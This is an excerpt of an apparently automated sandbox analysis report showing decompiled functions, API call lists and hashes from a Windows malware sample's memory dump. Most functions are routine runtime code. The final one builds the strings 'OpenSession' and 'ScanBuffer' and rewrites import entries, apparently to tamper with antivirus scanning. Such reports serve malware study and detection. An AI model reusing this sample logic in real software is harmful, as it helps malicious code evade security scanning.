                                                                                                0x02172f7d
                                                                                                0x02172f7e
                                                                                                0x02172f7f
                                                                                                0x02172f76
                                                                                                0x02172f90
                                                                                                0x02172f98
                                                                                                0x02172f98
                                                                                                0x02172f90
                                                                                                0x02172fc1
                                                                                                0x02172ef0
                                                                                                0x02172ef0
                                                                                                0x00000000
                                                                                                0x02172ef0
                                                                                                0x02172ee8

                                                                                                APIs
                                                                                                • CharNextA.USER32(00000000,?,?,00000000,00000000,?,0217300A,?,02194B88,?,02189AFF,ScanBuffer,0218E77C,OpenSession,0218E77C,Initialize), ref: 02172F02
                                                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0217300A,?,02194B88,?,02189AFF,ScanBuffer,0218E77C,OpenSession,0218E77C), ref: 02172F0C
                                                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0217300A,?,02194B88,?,02189AFF,ScanBuffer,0218E77C,OpenSession,0218E77C), ref: 02172F2B
                                                                                                • CharNextA.USER32(00000000,?,?,00000000,00000000,?,0217300A,?,02194B88,?,02189AFF,ScanBuffer,0218E77C,OpenSession,0218E77C,Initialize), ref: 02172F35
                                                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0217300A,?,02194B88,?,02189AFF,ScanBuffer,0218E77C,OpenSession,0218E77C), ref: 02172F61
                                                                                                • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,00000000,?,0217300A,?,02194B88,?,02189AFF,ScanBuffer,0218E77C,OpenSession), ref: 02172F6B
                                                                                                • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,00000000,?,0217300A,?,02194B88,?,02189AFF,ScanBuffer,0218E77C,OpenSession), ref: 02172F93
                                                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0217300A,?,02194B88,?,02189AFF,ScanBuffer,0218E77C,OpenSession,0218E77C), ref: 02172F9D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharNext
                                                                                                • String ID:
                                                                                                • API String ID: 3213498283-0
                                                                                                • Opcode ID: 8ac23a6a179341efb2a46d170a315450a42e94bf23a1cc473fad95e56f2766c4
                                                                                                • Instruction ID: 9b52fab1221446e754a4dcbbb86e5f326cf6fd4c2ca6f16ddef32bf80354b3f9
                                                                                                • Opcode Fuzzy Hash: 8ac23a6a179341efb2a46d170a315450a42e94bf23a1cc473fad95e56f2766c4
                                                                                                • Instruction Fuzzy Hash: D1318891ACC3E13EEB362A788CC472A6EF54BCE254F1908A5DD968B247D7B84843C751
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217B0B8 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0217B0B8(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0217AF30(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x2190e70; // 0x2191044
				if( *_t14 == 0) {
					_t16 =  *0x2190d6c; // 0x2176b54
					_t9 = _t16 + 4; // 0xffe9
					_t18 =  *0x21937f0; // 0x2170000
					LoadStringA(E02175AF0(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x2190d90; // 0x2191214
				E02172D28(E021733B0(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E021782CC( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x217b17c, 2,  &_v1092, 0);
			}












                                                                                                0x0217b0c7
                                                                                                0x0217b0cc
                                                                                                0x0217b0d4
                                                                                                0x0217b13b
                                                                                                0x0217b140
                                                                                                0x0217b144
                                                                                                0x0217b14f
                                                                                                0x00000000
                                                                                                0x0217b165
                                                                                                0x0217b0d6
                                                                                                0x0217b0e0
                                                                                                0x0217b0ef
                                                                                                0x0217b0ff
                                                                                                0x0217b112
                                                                                                0x00000000

                                                                                                APIs
                                                                                                  • Part of subcall function 0217AF30: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0217AF4D
                                                                                                  • Part of subcall function 0217AF30: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0217AF71
                                                                                                  • Part of subcall function 0217AF30: GetModuleFileNameA.KERNEL32(02170000,?,00000105), ref: 0217AF8C
                                                                                                  • Part of subcall function 0217AF30: LoadStringA.USER32 ref: 0217B022
                                                                                                • CharToOemA.USER32 ref: 0217B0EF
                                                                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0217B10C
                                                                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0217B112
                                                                                                • GetStdHandle.KERNEL32(000000F4,0217B17C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0217B127
                                                                                                • WriteFile.KERNEL32(00000000,000000F4,0217B17C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0217B12D
                                                                                                • LoadStringA.USER32 ref: 0217B14F
                                                                                                • MessageBoxA.USER32 ref: 0217B165
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 185507032-0
                                                                                                • Opcode ID: e13cc8b2bdb54517b39d38ac915fe1554f3caaf4808efd80a2e10f71ec6e171c
                                                                                                • Instruction ID: d7d213a4feb0c109524bf4cd0c3b645aaaae2452c5600171b484536d9128766d
                                                                                                • Opcode Fuzzy Hash: e13cc8b2bdb54517b39d38ac915fe1554f3caaf4808efd80a2e10f71ec6e171c
                                                                                                • Instruction Fuzzy Hash: E6117CB25D8240BED204EBA4CC81F9B77FEABC5310F404926B755D60E0DB72E9448F62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02188A2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98processsynchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 68%
                                                                                                			E02188A2E(void* __eax, void* __ebx, short __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				struct _STARTUPINFOA _v72;
				struct _PROCESS_INFORMATION _v88;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				CHAR* _t49;
				int _t54;
				void* _t67;
				intOrPtr _t83;
				short _t86;
				void* _t88;
				void* _t91;

				_t93 = __eflags;
				_v360 = 0;
				_v368 = 0;
				_v364 = 0;
				_v348 = 0;
				_v352 = 0;
				_v356 = 0;
				_t86 = __ecx;
				_t88 = __edx;
				_t67 = __eax;
				_push(_t91);
				_push(0x2188b94);
				_push( *[fs:eax]);
				 *[fs:eax] = _t91 + 0xfffffe94;
				_push(0x2188bac);
				E02174B04( &_v352, __eax, __eflags);
				_push(_v352);
				_push(0x2188bb8);
				E02174B04( &_v356, _t88, __eflags);
				_push(_v356);
				E02174C24();
				E02174B3C( &_v344, 0xff, _v348);
				E02173518( &_v72, 0x44);
				_v72.cb = 0x44;
				_v72.dwFlags = 1;
				_v72.wShowWindow = _t86;
				E02174B04( &_v364, _t67, _t93);
				E02178194(_v364,  &_v360);
				_t49 = E02174D64(_v360);
				E02174B04( &_v368,  &_v344, _t93);
				_t54 = CreateProcessA(0, E02174D64(_v368), 0, 0, 0, 0x30, 0, _t49,  &_v72,  &_v88);
				asm("sbb eax, eax");
				if(_t54 + 1 != 0) {
					WaitForSingleObject(_v88.hProcess, 0xffffffff);
					CloseHandle(_v88);
					CloseHandle(_v88.hThread);
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(E02188B9B);
				return E021748C4( &_v368, 6);
			}



















                                                                                                0x02188a2e
                                                                                                0x02188a3e
                                                                                                0x02188a44
                                                                                                0x02188a4a
                                                                                                0x02188a50
                                                                                                0x02188a56
                                                                                                0x02188a5c
                                                                                                0x02188a62
                                                                                                0x02188a64
                                                                                                0x02188a66
                                                                                                0x02188a6a
                                                                                                0x02188a6b
                                                                                                0x02188a70
                                                                                                0x02188a73
                                                                                                0x02188a76
                                                                                                0x02188a83
                                                                                                0x02188a88
                                                                                                0x02188a8e
                                                                                                0x02188a9b
                                                                                                0x02188aa0
                                                                                                0x02188ab1
                                                                                                0x02188ac7
                                                                                                0x02188ad6
                                                                                                0x02188adb
                                                                                                0x02188ae2
                                                                                                0x02188ae9
                                                                                                0x02188afd
                                                                                                0x02188b0e
                                                                                                0x02188b19
                                                                                                0x02188b35
                                                                                                0x02188b48
                                                                                                0x02188b50
                                                                                                0x02188b57
                                                                                                0x02188b5f
                                                                                                0x02188b68
                                                                                                0x02188b71
                                                                                                0x02188b71
                                                                                                0x02188b78
                                                                                                0x02188b7b
                                                                                                0x02188b7e
                                                                                                0x02188b93

                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B48
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B5F
                                                                                                • CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B68
                                                                                                • CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B71
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$CreateObjectProcessSingleWait
                                                                                                • String ID: D
                                                                                                • API String ID: 2059082233-2746444292
                                                                                                • Opcode ID: 53410cf5dce36f61f7772820ab92089b2dfbe405d3d48010be5b7fbaa019439b
                                                                                                • Instruction ID: 495cc74e86f05bc4201efbd2c4b653fe37919b2d0353b804a15d55f4dc40b27f
                                                                                                • Opcode Fuzzy Hash: 53410cf5dce36f61f7772820ab92089b2dfbe405d3d48010be5b7fbaa019439b
                                                                                                • Instruction Fuzzy Hash: 45315D70A8075C9FDB30EFA4CC81BDEB7BAEB89300F9041A5A508A7240DB759E85CF54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02188A30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97processsynchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 68%
                                                                                                			E02188A30(void* __eax, void* __ebx, short __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				struct _STARTUPINFOA _v72;
				struct _PROCESS_INFORMATION _v88;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				CHAR* _t49;
				int _t54;
				void* _t67;
				intOrPtr _t83;
				short _t86;
				void* _t88;
				void* _t91;

				_t93 = __eflags;
				_v360 = 0;
				_v368 = 0;
				_v364 = 0;
				_v348 = 0;
				_v352 = 0;
				_v356 = 0;
				_t86 = __ecx;
				_t88 = __edx;
				_t67 = __eax;
				_push(_t91);
				_push(0x2188b94);
				_push( *[fs:eax]);
				 *[fs:eax] = _t91 + 0xfffffe94;
				_push(0x2188bac);
				E02174B04( &_v352, __eax, __eflags);
				_push(_v352);
				_push(0x2188bb8);
				E02174B04( &_v356, _t88, __eflags);
				_push(_v356);
				E02174C24();
				E02174B3C( &_v344, 0xff, _v348);
				E02173518( &_v72, 0x44);
				_v72.cb = 0x44;
				_v72.dwFlags = 1;
				_v72.wShowWindow = _t86;
				E02174B04( &_v364, _t67, _t93);
				E02178194(_v364,  &_v360);
				_t49 = E02174D64(_v360);
				E02174B04( &_v368,  &_v344, _t93);
				_t54 = CreateProcessA(0, E02174D64(_v368), 0, 0, 0, 0x30, 0, _t49,  &_v72,  &_v88);
				asm("sbb eax, eax");
				if(_t54 + 1 != 0) {
					WaitForSingleObject(_v88.hProcess, 0xffffffff);
					CloseHandle(_v88);
					CloseHandle(_v88.hThread);
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(E02188B9B);
				return E021748C4( &_v368, 6);
			}



















                                                                                                0x02188a30
                                                                                                0x02188a3e
                                                                                                0x02188a44
                                                                                                0x02188a4a
                                                                                                0x02188a50
                                                                                                0x02188a56
                                                                                                0x02188a5c
                                                                                                0x02188a62
                                                                                                0x02188a64
                                                                                                0x02188a66
                                                                                                0x02188a6a
                                                                                                0x02188a6b
                                                                                                0x02188a70
                                                                                                0x02188a73
                                                                                                0x02188a76
                                                                                                0x02188a83
                                                                                                0x02188a88
                                                                                                0x02188a8e
                                                                                                0x02188a9b
                                                                                                0x02188aa0
                                                                                                0x02188ab1
                                                                                                0x02188ac7
                                                                                                0x02188ad6
                                                                                                0x02188adb
                                                                                                0x02188ae2
                                                                                                0x02188ae9
                                                                                                0x02188afd
                                                                                                0x02188b0e
                                                                                                0x02188b19
                                                                                                0x02188b35
                                                                                                0x02188b48
                                                                                                0x02188b50
                                                                                                0x02188b57
                                                                                                0x02188b5f
                                                                                                0x02188b68
                                                                                                0x02188b71
                                                                                                0x02188b71
                                                                                                0x02188b78
                                                                                                0x02188b7b
                                                                                                0x02188b7e
                                                                                                0x02188b93

                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B48
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B5F
                                                                                                • CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B68
                                                                                                • CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B71
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$CreateObjectProcessSingleWait
                                                                                                • String ID: D
                                                                                                • API String ID: 2059082233-2746444292
                                                                                                • Opcode ID: 8358bb58bf31a50f1552eea3acb1fd6e6977d88bce9fe78ef568f298f0691c61
                                                                                                • Instruction ID: 08f53d3e5793c618cc682cadaea3b485d8a3c7df8cb459659caee41b81a33bd5
                                                                                                • Opcode Fuzzy Hash: 8358bb58bf31a50f1552eea3acb1fd6e6977d88bce9fe78ef568f298f0691c61
                                                                                                • Instruction Fuzzy Hash: 5B315D70A8075C9FDB30EF94CC81BDEB7BAEB89300F9041A5A508A7240DB759E85CF54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02173B00 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 63%
                                                                                                			E02173B00() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x2190024 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t14 =  *0x2190024 & 0xffc0 | _v12 & 0x3f;
					 *0x2190024 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E02173B71);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x2173b78);
					return RegCloseKey(_v8);
				}
			}











                                                                                                0x02173b01
                                                                                                0x02173b03
                                                                                                0x02173b0d
                                                                                                0x02173b29
                                                                                                0x02173b8b
                                                                                                0x02173b8e
                                                                                                0x02173b97
                                                                                                0x02173b2b
                                                                                                0x02173b2d
                                                                                                0x02173b2e
                                                                                                0x02173b33
                                                                                                0x02173b36
                                                                                                0x02173b39
                                                                                                0x02173b55
                                                                                                0x02173b5c
                                                                                                0x02173b5f
                                                                                                0x02173b62
                                                                                                0x02173b70
                                                                                                0x02173b70

                                                                                                APIs
                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02173B22
                                                                                                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02173B71,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02173B55
                                                                                                • RegCloseKey.ADVAPI32(?,02173B78,00000000,?,00000004,00000000,02173B71,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02173B6B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                • API String ID: 3677997916-4173385793
                                                                                                • Opcode ID: 5dcc88988fcc6af2e2482fad01f690449180c2837cb74a8838888e61fa2a77de
                                                                                                • Instruction ID: 6770cfb824be7bf8e76ae6401d0deeefa171612062da33eba9ef36c63d0ee740
                                                                                                • Opcode Fuzzy Hash: 5dcc88988fcc6af2e2482fad01f690449180c2837cb74a8838888e61fa2a77de
                                                                                                • Instruction Fuzzy Hash: 9101B575980318BAFB21EB908C42FBA73FCDB88B00F6004E2BA14D7580E7745610DB54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217AC44 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 64%
                                                                                                			E0217AC44(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x217acdb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E0217A9B8(GetThreadLocale(), 0x217acf0, 0x100b,  &_v8);
				_t29 = E02177DC4(0x217acf0, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E0217AB90, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x21938f0;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E0217ABCC, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0217ACE2);
				return E021748A0( &_v8);
			}










                                                                                                0x0217ac44
                                                                                                0x0217ac47
                                                                                                0x0217ac4c
                                                                                                0x0217ac4d
                                                                                                0x0217ac52
                                                                                                0x0217ac55
                                                                                                0x0217ac6b
                                                                                                0x0217ac7d
                                                                                                0x0217ac87
                                                                                                0x0217ac97
                                                                                                0x0217ac9c
                                                                                                0x0217aca1
                                                                                                0x0217aca6
                                                                                                0x0217aca6
                                                                                                0x0217acac
                                                                                                0x0217acaf
                                                                                                0x0217acaf
                                                                                                0x0217acc0
                                                                                                0x0217acc0
                                                                                                0x0217acc7
                                                                                                0x0217acca
                                                                                                0x0217accd
                                                                                                0x0217acda

                                                                                                APIs
                                                                                                • GetThreadLocale.KERNEL32(?,00000000,0217ACDB,?,?,00000000), ref: 0217AC5C
                                                                                                  • Part of subcall function 0217A9B8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0217A9D6
                                                                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0217ACDB,?,?,00000000), ref: 0217AC8C
                                                                                                • EnumCalendarInfoA.KERNEL32(Function_0000AB90,00000000,00000000,00000004), ref: 0217AC97
                                                                                                • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0217ACDB,?,?,00000000), ref: 0217ACB5
                                                                                                • EnumCalendarInfoA.KERNEL32(Function_0000ABCC,00000000,00000000,00000003), ref: 0217ACC0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Locale$InfoThread$CalendarEnum
                                                                                                • String ID:
                                                                                                • API String ID: 4102113445-0
                                                                                                • Opcode ID: dec886564c7f814c064460140561e435439aa3c14fe7e7e2a15b1881d97e4f30
                                                                                                • Instruction ID: 890ce44ec0c20312221932420f84a50cfab5407fece0997fa6288c128521cb9c
                                                                                                • Opcode Fuzzy Hash: dec886564c7f814c064460140561e435439aa3c14fe7e7e2a15b1881d97e4f30
                                                                                                • Instruction Fuzzy Hash: 2D01D6716C4A887FF711ABB4CD11F6E767EDFC6720FA10570F511A66C0E7649E004AA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02185F6C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 268COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 56%
                                                                                                			E02185F6C(signed int __eax, void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				char _v100;
				intOrPtr _v104;
				char _v108;
				char _v112;
				void* _t69;
				signed int _t100;
				signed int _t101;
				intOrPtr _t104;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t116;
				signed int _t120;
				signed int _t157;
				void* _t200;
				signed int _t204;
				void* _t218;
				void* _t223;
				intOrPtr _t224;
				void* _t225;
				intOrPtr _t226;
				signed int _t227;
				void* _t232;
				void* _t237;
				intOrPtr _t238;
				intOrPtr _t239;
				void* _t245;
				void* _t250;
				intOrPtr _t251;
				signed int _t257;
				intOrPtr _t259;
				intOrPtr _t260;

				_t259 = _t260;
				_t200 = 0xd;
				do {
					_push(0);
					_push(0);
					_t200 = _t200 - 1;
				} while (_t200 != 0);
				_push(_t200);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t257 = __eax;
				_push(_t259);
				_push(0x2186329);
				_push( *[fs:eax]);
				 *[fs:eax] = _t260;
				_t69 = E0217304C(0x270e);
				_push(_t69);
				L021858FC();
				if(_t69 == 0) {
					E021748F4(0x2194598, 0x2186350);
				} else {
					E021748F4(0x2194598, 0x2186340);
				}
				_push(0x218635c);
				_push( *0x2194598);
				_push("OpenSession");
				E02174C24();
				E02174A98( &_v12, E02174D64(_v16));
				_push(_v12);
				E02174BB0( &_v24,  *0x2194598, 0x218635c);
				E02174A98( &_v20, E02174D64(_v24));
				_pop(_t218);
				E02183690(_v20, 0x2194580, _t218, _t257);
				_push(0x218635c);
				_push( *0x2194598);
				_push("ScanBuffer");
				E02174C24();
				E02174A98( &_v28, E02174D64(_v32));
				_push(_v28);
				E02174BB0( &_v40,  *0x2194598, 0x218635c);
				E02174A98( &_v36, E02174D64(_v40));
				_pop(_t223);
				E02183690(_v36, 0x2194580, _t223, _t257);
				 *0x219457c = _t257;
				while(1) {
					_t100 =  *0x219457c; // 0x0
					if( *((intOrPtr*)(_t100 + 0xc)) == 0) {
						break;
					}
					_t101 =  *0x219457c; // 0x0
					 *0x219458c =  *((intOrPtr*)(_t101 + 0xc)) +  *0x2194538;
					_push(0x2194590);
					_t104 =  *0x2194568; // 0x0
					_v8 = _t104;
					_push(E02175850());
					_t224 =  *0x219458c; // 0x0
					E02174A98( &_v44, _t224);
					_pop(_t225);
					_t109 = E02185958(_v8, 0x2194580, _v44, _t225, 0x2194598, _t257);
					__eflags = _t109;
					if(_t109 == 0) {
						_push(0x218635c);
						_push( *0x2194598);
						_push("OpenSession");
						E02174C24();
						E02174A98( &_v48, E02174D64(_v52));
						_push(_v48);
						E02174BB0( &_v60,  *0x2194598, 0x218635c);
						E02174A98( &_v56, E02174D64(_v60));
						_pop(_t245);
						E02183690(_v56, 0x2194580, _t245, _t257);
						_push(0x218635c);
						_push( *0x2194598);
						_push("ScanBuffer");
						E02174C24();
						E02174A98( &_v64, E02174D64(_v68));
						_push(_v64);
						E02174BB0( &_v76,  *0x2194598, 0x218635c);
						E02174A98( &_v72, E02174D64(_v76));
						_pop(_t250);
						E02183690(_v72, 0x2194580, _t250, _t257);
						_t251 =  *0x219458c; // 0x0
						E02174A98( &_v80, _t251);
						E02185BC0( *((intOrPtr*)(_a4 - 4)), 0x2194580, _v80, 0x2194598, _t257, __eflags);
					}
					_t110 =  *0x219457c; // 0x0
					__eflags =  *(_t110 + 4);
					if( *(_t110 + 4) != 0) {
						_t111 =  *0x219457c; // 0x0
						 *0x2194580 =  *_t111 +  *0x2194538;
					} else {
						_t157 =  *0x219457c; // 0x0
						 *0x2194580 =  *((intOrPtr*)(_t157 + 0x10)) +  *0x2194538;
					}
					while(1) {
						_t257 =  *( *0x2194580);
						__eflags = _t257;
						if(_t257 == 0) {
							break;
						}
						_t116 = E02185F60(_t257);
						__eflags = _t116;
						if(_t116 == 0) {
							_t120 =  *( *0x2194580) +  *0x2194538 + 2;
							__eflags = _t120;
							 *0x2194584 = _t120;
							_t204 =  *0x2194584; // 0x0
							_t226 =  *0x219458c; // 0x0
							 *0x2194588 = E02185CD8( *((intOrPtr*)(_a4 - 4)), _t204, _t226, _t120);
						} else {
							_push(0x218635c);
							_push( *0x2194598);
							_push("OpenSession");
							E02174C24();
							E02174A98( &_v84, E02174D64(_v88));
							_push(_v84);
							E02174BB0( &_v96,  *0x2194598, 0x218635c);
							E02174A98( &_v92, E02174D64(_v96));
							_pop(_t232);
							E02183690(_v92, 0x2194580, _t232, _t257);
							_push(0x218635c);
							_push( *0x2194598);
							_push("ScanBuffer");
							E02174C24();
							E02174A98( &_v100, E02174D64(_v104));
							_push(_v100);
							E02174BB0( &_v112,  *0x2194598, 0x218635c);
							E02174A98( &_v108, E02174D64(_v112));
							_pop(_t237);
							E02183690(_v108, 0x2194580, _t237, _t257);
							_t238 =  *0x219458c; // 0x0
							 *0x2194588 = E02185CD8( *((intOrPtr*)(_a4 - 4)),  *( *0x2194580) & 0x0000ffff, _t238, __eflags);
						}
						_t227 =  *0x2194588; // 0x0
						 *( *0x2194580) = _t227;
						 *0x2194580 =  &(( *0x2194580)[1]);
						__eflags =  *0x2194580;
					}
					 *0x219457c =  *0x219457c + 0x14;
					__eflags =  *0x219457c;
				}
				_pop(_t239);
				 *[fs:eax] = _t239;
				_push(E02186330);
				return E021748C4( &_v112, 0x1a);
			}


























































                                                                                                0x02185f6d
                                                                                                0x02185f6f
